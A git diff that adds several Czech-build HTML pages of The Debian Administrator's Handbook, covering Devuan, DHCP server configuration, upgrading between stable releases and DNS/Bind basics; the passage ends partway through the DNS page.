+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.kali.html"
+        title="A.8. Kali Linux" /><link
+        rel="next"
+        href="sect.tanglu.html"
+        title="A.10. Tanglu" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.devuan.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kali.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.tanglu.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.devuan"></a>A.9. Devuan</h2></div></div></div><a
+          id="id-1.20.12.2"
+          class="indexterm"></a><div
+          class="para">
+			Devuan is a relatively new fork of Debian: it started in 2014 as a reaction to the decision made by Debian to switch to <code
+            class="command">systemd</code> as the default init system. A group of users attached to <code
+            class="command">sysv</code> and opposing (real or perceived) drawbacks to <code
+            class="command">systemd</code> started Devuan with the objective of maintaining a <code
+            class="command">systemd</code>-less system. As of March 2015, they haven't published any real release: it remains to be seen if the project will succeed and find its niche, or if the systemd opponents will learn to accept it. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://devuan.org">https://devuan.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kali.html"><strong>Předcházející</strong>A.8. Kali Linux</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.tanglu.html"><strong>Další</strong>A.10. Tanglu</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dhcp.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dhcp.html
new file mode 100644
index 000000000..a8d96eb55
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dhcp.html
@@ -0,0 +1,184 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.7. DHCP</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.domain-name-servers.html"
+        title="10.6. Domain Name Servers (DNS)" /><link
+        rel="next"
+        href="sect.network-diagnosis-tools.html"
+        title="10.8. Network Diagnosis Tools" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dhcp.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.domain-name-servers.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-diagnosis-tools.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dhcp"></a>10.7. DHCP</h2></div></div></div><div
+          class="para">
+			DHCP (for <span
+            class="emphasis"><em>Dynamic Host Configuration Protocol</em></span>) is a protocol by which a machine can automatically get its network configuration when it boots. This allows centralizing the management of network configurations, and ensuring that all desktop machines get similar settings.
+		</div><a
+          id="id-1.13.10.3"
+          class="indexterm"></a><a
+          id="id-1.13.10.4"
+          class="indexterm"></a><a
+          id="id-1.13.10.5"
+          class="indexterm"></a><div
+          class="para">
+			A DHCP server provides many network-related parameters. The most common of these is an IP address and the network where the machine belongs, but it can also provide other information, such as DNS servers, WINS servers, NTP servers, and so on.
+		</div><div
+          class="para">
+			The Internet Software Consortium (also involved in developing <code
+            class="command">bind</code>) is the main author of the DHCP server. The matching Debian package is <span
+            class="pkg pkg">isc-dhcp-server</span>.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dhcp-config"></a>10.7.1. Configuring</h3></div></div></div><div
+            class="para">
+				The first elements that need to be edited in the DHCP server configuration file (<code
+              class="filename">/etc/dhcp/dhcpd.conf</code>) are the domain name and the DNS servers. If this server is alone on the local network (as defined by the broadcast propagation), the <code
+              class="literal">authoritative</code> directive must also be enabled (or uncommented). One also needs to create a <code
+              class="literal">subnet</code> section describing the local network and the configuration information to be provided. The following example fits a <code
+              class="literal">192.168.0.0/24</code> local network with a router at <code
+              class="literal">192.168.0.1</code> serving as the gateway. Available IP addresses are in the range <code
+              class="literal">192.168.0.128</code> to <code
+              class="literal">192.168.0.254</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.dhcp-dhcpd.conf"></a><p
+              class="title"><strong>Příklad 10.15. Excerpt of <code
+                  class="filename">/etc/dhcp/dhcpd.conf</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+#
+# Sample configuration file for ISC dhcpd for Debian
+#
+
+# The ddns-updates-style parameter controls whether or not the server will
+# attempt to do a DNS update when a lease is confirmed. We default to the
+# behavior of the version 2 packages ('none', since DHCP v2 didn't
+# have support for DDNS.)
+ddns-update-style interim;
+
+# option definitions common to all supported networks...
+option domain-name "internal.falcot.com";
+option domain-name-servers ns.internal.falcot.com;
+
+default-lease-time 600;
+max-lease-time 7200;
+
+# If this DHCP server is the official DHCP server for the local
+# network, the authoritative directive should be uncommented.
+authoritative;
+
+# Use this to send dhcp log messages to a different log file (you also
+# have to hack syslog.conf to complete the redirection).
+log-facility local7;
+
+# My subnet
+subnet 192.168.0.0 netmask 255.255.255.0 {
+    option routers 192.168.0.1;
+    option broadcast-address 192.168.0.255;
+    range 192.168.0.128 192.168.0.254;
+    ddns-domainname "internal.falcot.com";
+}
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dhcp-dns"></a>10.7.2. DHCP and DNS</h3></div></div></div><a
+            id="id-1.13.10.9.2"
+            class="indexterm"></a><div
+            class="para">
+				A nice feature is the automated registering of DHCP clients in the DNS zone, so that each machine gets a significant name (rather than something impersonal such as <code
+              class="literal">machine-192-168-0-131.internal.falcot.com</code>). Using this feature requires configuring the DNS server to accept updates to the <code
+              class="literal">internal.falcot.com</code> DNS zone from the DHCP server, and configuring the latter to submit updates for each registration.
+			</div><div
+            class="para">
+				In the <code
+              class="command">bind</code> case, the <code
+              class="literal">allow-update</code> directive needs to be added to each of the zones that the DHCP server is to edit (the one for the <code
+              class="literal">internal.falcot.com</code> domain, and the reverse zone). This directive lists the IP addresses allowed to perform these updates; it should therefore contain the possible addresses of the DHCP server (both the local address and the public address, if appropriate).
+			</div><pre
+            class="programlisting">
+allow-update { 127.0.0.1 192.168.0.1 212.94.201.10 !any };
+</pre><div
+            class="para">
+				Beware! A zone that can be modified <span
+              class="emphasis"><em>will</em></span> be changed by <code
+              class="command">bind</code>, and the latter will overwrite its configuration files at regular intervals. Since this automated procedure produces files that are less human-readable than manually-written ones, the Falcot administrators handle the <code
+              class="literal">internal.falcot.com</code> domain with a delegated DNS server; this means the <code
+              class="literal">falcot.com</code> zone file stays firmly under their manual control.
+			</div><div
+            class="para">
+				The DHCP server configuration excerpt above already includes the directives required for DNS zone updates: they are the <code
+              class="literal">ddns-update-style interim;</code> and <code
+              class="literal">ddns-domain-name "internal.falcot.com";</code> lines in the block describing the subnet.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.domain-name-servers.html"><strong>Předcházející</strong>10.6. Domain Name Servers (DNS)</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-diagnosis-tools.html"><strong>Další</strong>10.8. Network Diagnosis Tools</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dist-upgrade.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dist-upgrade.html
new file mode 100644
index 000000000..fa1dcf5f0
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.dist-upgrade.html
@@ -0,0 +1,199 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.6. Upgrading from One Stable Distribution to the Next</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.package-authentication.html"
+        title="6.5. Checking Package Authenticity" /><link
+        rel="next"
+        href="sect.regular-upgrades.html"
+        title="6.7. Keeping a System Up to Date" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dist-upgrade.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-authentication.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.regular-upgrades.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dist-upgrade"></a>6.6. Upgrading from One Stable Distribution to the Next</h2></div></div></div><div
+          class="para">
+			One of the best-known features of Debian is its ability to upgrade an installed system from one stable release to the next: <span
+            class="foreignphrase"><em
+              class="foreignphrase">dist-upgrade</em></span> — a well-known phrase — has largely contributed to the project's reputation. With a few precautions, upgrading a computer can take as little as a few minutes, or a few dozen minutes, depending on the download speed from the package repositories.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.15.3"></a>6.6.1. Recommended Procedure</h3></div></div></div><div
+            class="para">
+				Since Debian has quite some time to evolve in-between stable releases, you should read the release notes before upgrading.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Release notes</strong></p></div></div></div><div
+              class="para">
+				The release notes for an operating system (and, more generally, for any software) are a document giving an overview of the software, with some details concerning the particularities of one version. These documents are generally short compared to the complete documentation, and they usually list the features which have been introduced since the previous version. They also give details on upgrading procedures, warnings for users of previous versions, and sometimes errata.
+			</div><div
+              class="para">
+				Release notes are available online: the release notes for the current stable release have a dedicated URL, while older release notes can be found with their codenames: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/releasenotes">http://www.debian.org/releases/stable/releasenotes</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/jessie/releasenotes">http://www.debian.org/releases/jessie/releasenotes</a></div>
+			</div></div><div
+            class="para">
+				In this section, we will focus on upgrading a <span
+              class="distribution distribution">Jessie</span> system to <span
+              class="distribution distribution">Stretch</span>. This is a major operation on a system; as such, it is never 100% risk-free, and should not be attempted before all important data has been backed up.
+			</div><div
+            class="para">
+				Another good habit which makes the upgrade easier (and shorter) is to tidy your installed packages and keep only the ones that are really needed. Helpful tools to do that include <code
+              class="command">aptitude</code>, <code
+              class="command">deborphan</code> and <code
+              class="command">debfoster</code> (see <a
+              class="xref"
+              href="sect.apt-get.html#sect.automatic-tracking">6.2.7 – „Tracking Automatically Installed Packages“</a>). For example, you can use the following command, and then use <code
+              class="command">aptitude</code>'s interactive mode to double check and fine-tune the scheduled removals:
+			</div><pre
+            class="screen"># <strong
+              class="userinput"><code>deborphan | xargs aptitude --schedule-only remove</code></strong></pre><div
+            class="para">
+				Now for the upgrading itself. First, you need to change the <code
+              class="filename">/etc/apt/sources.list</code> file to tell APT to get its packages from <span
+              class="distribution distribution">Stretch</span> instead of <span
+              class="distribution distribution">Jessie</span>. If the file only contains references to <span
+              class="distribution distribution">Stable</span> rather than explicit codenames, the change isn't even required, since <span
+              class="distribution distribution">Stable</span> always refers to the latest released version of Debian. In both cases, the database of available packages must be refreshed (with the <code
+              class="command">apt update</code> command or the refresh button in <code
+              class="command">synaptic</code>).
+			</div><div
+            class="para">
+				Once these new package sources are registered, you should first do a minimal upgrade with <code
+              class="command">apt upgrade</code>. By doing the upgrade in two steps, we ease the job of the package management tools and often ensure that we have the latest versions of those, which might have accumulated bugfixes and improvements required to complete the full distribution upgrade.
+			</div><div
+            class="para">
+				Once this first upgrade is done, it is time to handle the upgrade itself, either with <code
+              class="command">apt full-upgrade</code>, <code
+              class="command">aptitude</code>, or <code
+              class="command">synaptic</code>. You should carefully check the suggested actions before applying them: you might want to add suggested packages or deselect packages which are only recommended and known not to be useful. In any case, the front-end should come up with a scenario ending in a coherent and up-to-date <span
+              class="distribution distribution">Stretch</span> system. Then, all you need is to do is wait while the required packages are downloaded, answer the Debconf questions and possibly those about locally modified configuration files, and sit back while APT does its magic.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.15.4"></a>6.6.2. Handling Problems after an Upgrade</h3></div></div></div><div
+            class="para">
+				In spite of the Debian maintainers' best efforts, a major system upgrade isn't always as smooth as you could wish. New software versions may be incompatible with previous ones (for instance, their default behavior or their data format may have changed). Also, some bugs may slip through the cracks despite the testing phase which always precedes a Debian release.
+			</div><div
+            class="para">
+				To anticipate some of these problems, you can install the <span
+              class="pkg pkg">apt-listchanges</span> package, which displays information about possible problems at the beginning of a package upgrade. This information is compiled by the package maintainers and put in <code
+              class="filename">/usr/share/doc/<em
+                class="replaceable">package</em>/NEWS.Debian</code> files for the benefit of users. Reading these files (possibly through <span
+              class="pkg pkg">apt-listchanges</span>) should help you avoid bad surprises.
+			</div><div
+            class="para">
+				You might sometimes find that the new version of a software doesn't work at all. This generally happens if the application isn't particularly popular and hasn't been tested enough; a last-minute update can also introduce regressions which are only found after the stable release. In both cases, the first thing to do is to have a look at the bug tracking system at <code
+              class="literal">https://bugs.debian.org/<em
+                class="replaceable">package</em></code>, and check whether the problem has already been reported. If it hasn't, you should report it yourself with <code
+              class="command">reportbug</code>. If it is already known, the bug report and the associated messages are usually an excellent source of information related to the bug:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						sometimes a patch already exists, and it is available on the bug report; you can then recompile a fixed version of the broken package locally (see <a
+                    class="xref"
+                    href="debian-packaging.html#sect.rebuilding-package">15.1 – „Rebuilding a Package from its Sources“</a>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						in other cases, users may have found a workaround for the problem and shared their insights about it in their replies to the report;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						in yet other cases, a fixed package may have already been prepared and made public by the maintainer.
+					</div></li></ul></div><div
+            class="para">
+				Depending on the severity of the bug, a new version of the package may be prepared specifically for a new revision of the stable release. When this happens, the fixed package is made available in the <code
+              class="literal">proposed-updates</code> section of the Debian mirrors (see <a
+              class="xref"
+              href="apt.html#sect.proposed-updates">6.1.2.3 – „Proposed Updates“</a>). The corresponding entry can then be temporarily added to the <code
+              class="filename">sources.list</code> file, and updated packages can be installed with <code
+              class="command">apt</code> or <code
+              class="command">aptitude</code>.
+			</div><div
+            class="para">
+				Sometimes the fixed package isn't available in this section yet because it is pending a validation by the Stable Release Managers. You can verify if that's the case on their web page. Packages listed there aren't available yet, but at least you know that the publication process is ongoing. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://release.debian.org/proposed-updates/stable.html">https://release.debian.org/proposed-updates/stable.html</a></div>
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-authentication.html"><strong>Předcházející</strong>6.5. Checking Package Authenticity</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.regular-upgrades.html"><strong>Další</strong>6.7. Keeping a System Up to Date</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.domain-name-servers.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.domain-name-servers.html
new file mode 100644
index 000000000..207e6abc2
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.domain-name-servers.html
@@ -0,0 +1,355 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.6. Domain Name Servers (DNS)</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.ipv6.html"
+        title="10.5. IPv6" /><link
+        rel="next"
+        href="sect.dhcp.html"
+        title="10.7. DHCP" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.domain-name-servers.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ipv6.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dhcp.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.domain-name-servers"></a>10.6. Domain Name Servers (DNS)</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dns-principe"></a>10.6.1. Principle and Mechanism</h3></div></div></div><a
+            id="id-1.13.9.2.2"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.3"
+            class="indexterm"></a><div
+            class="para">
+				The <span
+              class="emphasis"><em>Domain Name Service</em></span> (DNS) is a fundamental component of the Internet: it maps host names to IP addresses (and vice-versa), which allows the use of <code
+              class="literal">www.debian.org</code> instead of <code
+              class="literal">5.153.231.4</code> or <code
+              class="literal">2001:41c8:1000:21::21:4</code>.
+			</div><div
+            class="para">
+				DNS records are organized in zones; each zone matches either a domain (or a subdomain) or an IP address range (since IP addresses are generally allocated in consecutive ranges). A primary server is authoritative on the contents of a zone; secondary servers, usually hosted on separate machines, provide regularly refreshed copies of the primary zone.
+			</div><a
+            id="id-1.13.9.2.6"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.7"
+            class="indexterm"></a><div
+            class="para">
+				Each zone can contain records of various kinds (<span
+              class="emphasis"><em>Resource Records</em></span>):
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">A</code>: IPv4 address. <a
+                    id="id-1.13.9.2.9.1.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">CNAME</code>: alias (<span
+                    class="emphasis"><em>canonical name</em></span>). <a
+                    id="id-1.13.9.2.9.2.1.3"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">MX</code>: <span
+                    class="emphasis"><em>mail exchange</em></span>, an email server. This information is used by other email servers to find where to send email addressed to a given address. Each MX record has a priority. The highest-priority server (with the lowest number) is tried first (see sidebar <a
+                    class="xref"
+                    href="network-services.html#sidebar.smtp"><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> SMTP</a>); other servers are contacted in order of decreasing priority if the first one does not reply. <a
+                    id="id-1.13.9.2.9.3.1.4"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">PTR</code>: mapping of an IP address to a name. Such a record is stored in a “reverse DNS” zone named after the IP address range. For example, <code
+                    class="literal">1.168.192.in-addr.arpa</code> is the zone containing the reverse mapping for all addresses in the <code
+                    class="literal">192.168.1.0/24</code> range. <a
+                    id="id-1.13.9.2.9.4.1.4"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">AAAA</code>: IPv6 address. <a
+                    id="id-1.13.9.2.9.5.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">NS</code>: maps a name to a name server. Each domain must have at least one NS record. These records point at a DNS server that can answer queries concerning this domain; they usually point at the primary and secondary servers for the domain. These records also allow DNS delegation; for instance, the <code
+                    class="literal">falcot.com</code> zone can include an NS record for <code
+                    class="literal">internal.falcot.com</code>, which means that the <code
+                    class="literal">internal.falcot.com</code> zone is handled by another server. Of course, this server must declare an <code
+                    class="literal">internal.falcot.com</code> zone. <a
+                    id="id-1.13.9.2.9.6.1.6"
+                    class="indexterm"></a>
+					</div></li></ul></div><a
+            id="id-1.13.9.2.10"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.11"
+            class="indexterm"></a><div
+            class="para">
+				The reference name server, Bind, was developed and is maintained by ISC (<span
+              class="emphasis"><em>Internet Software Consortium</em></span>). It is provided in Debian by the <span
+              class="pkg pkg">bind9</span> package. Version 9 brings two major changes compared to previous versions. First, the DNS server can now run under an unprivileged user, so that a security vulnerability in the server does not grant root privileges to the attacker (as was seen repeatedly with versions 8.x).
+			</div><div
+            class="para">
+				Furthermore, Bind supports the DNSSEC standard for signing (and therefore authenticating) DNS records, which allows blocking any spoofing of this data during man-in-the-middle attacks.
+			</div><a
+            id="id-1.13.9.2.14"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.15"
+            class="indexterm"></a><a
+            id="id-1.13.9.2.16"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> DNSSEC</strong></p></div></div></div><a
+              id="id-1.13.9.2.17.2"
+              class="indexterm"></a><div
+              class="para">
+				The DNSSEC norm is quite complex; this partly explains why it is not in widespread usage yet (even if it perfectly coexists with DNS servers unaware of DNSSEC). To understand all the ins and outs, you should check the following article. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions">http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions</a></div>
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dns-config"></a>10.6.2. Configuring</h3></div></div></div><div
+            class="para">
+				Configuration files for <code
+              class="command">bind</code>, irrespective of version, have the same structure.
+			</div><div
+            class="para">
+				The Falcot administrators created a primary <code
+              class="literal">falcot.com</code> zone to store information related to this domain, and a <code
+              class="literal">168.192.in-addr.arpa</code> zone for reverse mapping of IP addresses in the local networks.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Names of reverse zones</strong></p></div></div></div><a
+              id="id-1.13.9.3.4.2"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.3"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.4"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.5"
+              class="indexterm"></a><a
+              id="id-1.13.9.3.4.6"
+              class="indexterm"></a><div
+              class="para">
+				Reverse zones have a particular name. The zone covering the <code
+                class="literal">192.168.0.0/16</code> network needs to be named <code
+                class="literal">168.192.in-addr.arpa</code>: the IP address components are reversed, and followed by the <code
+                class="literal">in-addr.arpa</code> suffix.
+			</div><div
+              class="para">
+				For IPv6 networks, the suffix is <code
+                class="literal">ip6.arpa</code> and the IP address components which are reversed are each character in the full hexadecimal representation of the IP address. As such, the <code
+                class="literal">2001:0bc8:31a0::/48</code> network would use a zone named <code
+                class="literal">0.a.1.3.8.c.b.0.1.0.0.2.ip6.arpa</code>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Testing the DNS server</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="command">host</code> command (in the <span
+                class="pkg pkg">bind9-host</span> package) queries a DNS server, and can be used to test the server configuration. For example, <code
+                class="command">host machine.falcot.com localhost</code> checks the local server's reply for the <code
+                class="literal">machine.falcot.com</code> query. <code
+                class="command">host <em
+                  class="replaceable">ipaddress</em> localhost</code> tests the reverse resolution.
+			</div><a
+              id="id-1.13.9.3.5.3"
+              class="indexterm"></a></div><div
+            class="para">
+				The following configuration excerpts, taken from the Falcot files, can serve as starting points to configure a DNS server:
+			</div><a
+            id="id-1.13.9.3.7"
+            class="indexterm"></a><a
+            id="id-1.13.9.3.8"
+            class="indexterm"></a><div
+            class="example"><a
+              xmlns=""
+              id="example.bind-named.conf.local"></a><p
+              class="title"><strong>Příklad 10.12. Excerpt of <code
